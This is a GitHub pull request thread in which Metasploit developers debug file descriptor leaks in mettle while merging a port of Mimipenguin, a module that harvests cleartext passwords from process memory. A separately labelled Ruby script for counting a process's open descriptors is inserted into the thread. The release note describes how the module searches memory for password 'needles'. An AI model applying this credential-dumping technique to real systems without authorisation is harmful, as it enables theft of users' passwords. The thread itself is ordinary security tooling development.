I haven't looked into the specific bug/logging scenario here; but thought it was worth noting that I ran into a similar logging output as part of an unrelated bug, it turns out that unhandled tlv packets are continuously logged to msfconsole - as it's waiting for a handler to come along eventually and do something with the TLV packet. So the continual logging may or may not be your actual issue 😄

@bwatters-r7

bwatters-r7 commented Sep 1, 2022

@adfoster-r7 Oh; I see. Yeah. I popped open the definitive source of truth known as wireshark, and I'm seeing a never-ending channel close request in logs, but I am not seeing associated packets on the wire.
I'm logging the calls to channel close, and they are coming in, but the channel close requests are still in the queue, and are appearing in the log because they were not removed?
Are you saying this may be an issue with us not removing the channel close requests from the queue on the framework side?

@bwatters-r7

OK..... problem located. The mad rush of cmd_exec calls is hitting the file descriptor limits allowed by the target's kernel. If I bump the value of nofiles on the target, we can get through the module.

@adfoster-r7

adfoster-r7 commented Sep 1, 2022

> The mad rush of cmd_exec calls is hitting the file descriptor limits allowed by the target's kernel

It doesn't look like this PR creates threads, it looks quite synchronous to me at the surface value - but I haven't looked further so let me know if I'm missing something there 👀

I believe the issue is caused by file descriptors being leaked and not closed correctly as part of cmd_exec - similar to rapid7/metasploit-payloads#569

@bwatters-r7

bwatters-r7 commented Sep 2, 2022

Yup; the module is implemented synchronously, but the underlying implementation of mettle requests and channelized IO is threaded - while we wait for the output, the cleanup can/is asynchronous threads (at least we have mutexes protecting channelized IO close logic).
That said, I absolutely agree we should check out the file descriptors. It looks like we might have the possibility of leaking them (and maybe memory) here: https://github.com/rapid7/mettle/pull/232/files#diff-0618be7869581afcaf30c846e0d2763df2388afd9b8007ece5c5858ca817f37eR482

Edit and thought: Though, that would not solve the echo issue....

@adfoster-r7

I wasn't sure which thread/issue is the main one to reply to, but I posted my latest debug steps on #16966 (comment) - just let me know where's best to continue the discussion if that's the wrong place to thread the conversation 🎉

@bwatters-r7

Yeah; I think we're maybe looking at two things right now. I do think we have a possible fd leak in the mettle code for this PR functionality, and another leak in mettle's process creation in general. :limes:
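
An added example, not part of the thread and not Metasploit or mettle code: one way to confirm the descriptor exhaustion discussed in the comments above is to compare what a process holds under `/proc/<pid>/fd` with the soft "Max open files" value in `/proc/<pid>/limits`, and to group the descriptors by kind so a leak of one type stands out. The function names are hypothetical and the sample data is constructed.

```ruby
# Constructed sample of /proc/<pid>/limits (not taken from the thread).
SAMPLE_LIMITS = <<~LIMITS
  Limit                     Soft Limit           Hard Limit           Units
  Max cpu time              unlimited            unlimited            seconds
  Max open files            1024                 1048576              files
  Max locked memory         8388608              8388608              bytes
LIMITS

# Constructed readlink targets of /proc/<pid>/fd/*: stdio, one socket and
# a large number of pipes that were never closed.
SAMPLE_FD_TARGETS = (['/dev/null'] * 3) + ['socket:[1111]'] +
                    (0...850).map { |i| "pipe:[#{20_000 + i}]" }

# Extract the soft and hard RLIMIT_NOFILE values from /proc/<pid>/limits text.
def parse_nofile_limits(limits_text)
  line = limits_text.each_line.find { |l| l.start_with?('Max open files') }
  return nil unless line

  soft, hard = line.sub('Max open files', '').split.first(2)
  convert = ->(v) { v == 'unlimited' ? Float::INFINITY : Integer(v) }
  { soft: convert.call(soft), hard: convert.call(hard) }
end

# Map a /proc/<pid>/fd symlink target to a coarse descriptor kind.
def classify_fd(target)
  case target
  when /\Apipe:\[\d+\]\z/ then :pipe
  when /\Asocket:\[\d+\]\z/ then :socket
  when /\Aanon_inode:/ then :anon_inode
  when %r{\A/dev/(?:null|pts/\d+|tty\w*)\z} then :device
  else :file
  end
end

# Summarise descriptor usage against the soft limit.
def fd_report(limits_text, fd_targets, warn_ratio: 0.8)
  limits = parse_nofile_limits(limits_text)
  raise ArgumentError, 'no "Max open files" line found' unless limits

  by_kind = fd_targets.each_with_object(Hash.new(0)) do |target, counts|
    counts[classify_fd(target)] += 1
  end
  used = fd_targets.length
  {
    used: used,
    soft_limit: limits[:soft],
    remaining: limits[:soft] - used,
    by_kind: by_kind,
    near_limit: used >= limits[:soft] * warn_ratio
  }
end

# Read the live descriptor targets of a process (Linux only; needs permission
# to read /proc/<pid>/fd).
def live_fd_targets(pid)
  Dir.children("/proc/#{pid}/fd").map do |fd|
    File.readlink("/proc/#{pid}/fd/#{fd}")
  rescue SystemCallError
    nil # descriptor was closed between listing and readlink
  end.compact
end

if __FILE__ == $PROGRAM_NAME
  report = fd_report(SAMPLE_LIMITS, SAMPLE_FD_TARGETS)
  puts "open: #{report[:used]} / soft limit #{report[:soft_limit]}"
  report[:by_kind].each { |kind, count| puts "  #{kind}: #{count}" }
  puts 'descriptor count is close to the soft limit' if report[:near_limit]
end
```

For a live process, pass `File.read("/proc/#{pid}/limits")` and `live_fd_targets(pid)` to `fd_report` and sample it repeatedly: a count that keeps growing while the workload is idle points at a leak rather than at a limit that is simply too low.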

@space-r7

space-r7 commented Sep 8, 2022

I managed to get a Kali ARM VM running and tested it with the module. It doesn't appear that Kali caches passwords in memory, but I added AARCH64 support to the module in case other distros cache passwords.

@bwatters-r7 bwatters-r7 merged commit 88f1495 into rapid7:master Sep 19, 2022
@bwatters-r7

Release Notes

This adds a port of Mimipenguin to Metasploit. Relying on mem_search() and mem_read() (rapid7/mettle#232), this searches the memory regions of various processes for needles that are found near passwords in cleartext. Using the locations for all of the needles found, this will search the nearby regions for possible passwords.

@space-r7 space-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 19, 2022
@huntergregal

@bcoles @space-r7

I want to thank you both heavily for your continued contributions to the modern version of MimiPenguin. Seeing it finally make it into Metasploit is heartwarming and a testament to the open-source community.

I have been away from this project for some time now - focusing mainly on my professional career. So it means a lot to see such contributions to the project. Without you two I'm not sure a proper MimiPenguin module ever would have come to fruition in any meaningful timeline.

Please don't hesitate to reach out to me on Twitter. I owe you both a beer.
#HackThePlanet

@space-r7 space-r7 deleted the add_mem_search branch October 18, 2022 13:51
@space-r7

> @bcoles @space-r7
>
> I want to thank you both heavily for your continued contributions to the modern version of MimiPenguin. Seeing it finally make it into Metasploit is heartwarming and a testament to the open-source community.
>
> I have been away from this project for some time now - focusing mainly on my professional career. So it means a lot to see such contributions to the project. Without you two I'm not sure a proper MimiPenguin module ever would have come to fruition in any meaningful timeline.
>
> Please don't hesitate to reach out to me on Twitter. I owe you both a beer. #HackThePlanet

Thank you so much, @huntergregal!

Labels: creds, docs, module, rn-modules (release notes for new or majorly enhanced modules)
6 participants